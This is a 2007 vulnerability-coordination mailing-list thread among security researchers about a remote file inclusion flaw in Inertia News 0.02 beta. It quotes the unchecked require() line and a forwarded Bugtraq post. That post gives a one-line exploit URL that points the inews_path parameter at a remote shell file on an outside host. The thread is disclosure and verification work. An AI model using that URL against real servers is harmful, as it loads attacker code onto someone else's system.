[VIM] true: Inertia News Remote File İnclude
Gadi Evron
ge at linuxbox.org
Tue Feb 13 09:07:51 EST 2007
On Tue, 13 Feb 2007, str0ke wrote:
> This was posted up on 12/21/2006.
>
> http://www.milw0rm.com/exploits/2976
Any guidelines you want us to follow then when we test stuff and share?
>
> /str0ke
>
> On 2/13/07, Noam Rathaus <noamr at beyondsecurity.com> wrote:
> > Hi,
> >
> > It looks legit:
> >
> > <snip>
> > require ("$inews_path/inertia_sql_class.php");
> > </snip>
> >
> > No tests done to the value.
> >
> > Product looks like abandon ware (http://www.brentc.com/inertianews/).
> >
> > ---------- Forwarded Message ----------
> >
> > Subject: Inertia News Remote File İnclude
> > Date: Monday 12 February 2007 22:55
> > From: crazy_king at eno7.org
> > To: bugtraq at securityfocus.com
> >
> > Version :
> > 0.02 beta
> >
> > Error :
> > require ("$inews_path/inertia_sql_class.php");
> >
> > Exploit :
> > http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
> > ell.txt
> >
> > Eno7.Org - Crazy-King.ORg
> >
> > Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim
> >
> > -------------------------------------------------------
> >
> > --
> > Noam Rathaus
> > CTO
> > 1616 Anderson Rd.
> > McLean, VA 22102
> > Tel: 703.286.7725 extension 105
> > Fax: 888.667.7740
> > noamr at beyondsecurity.com
> > http://www.beyondsecurity.com
> >
>
More information about the VIM
mailing list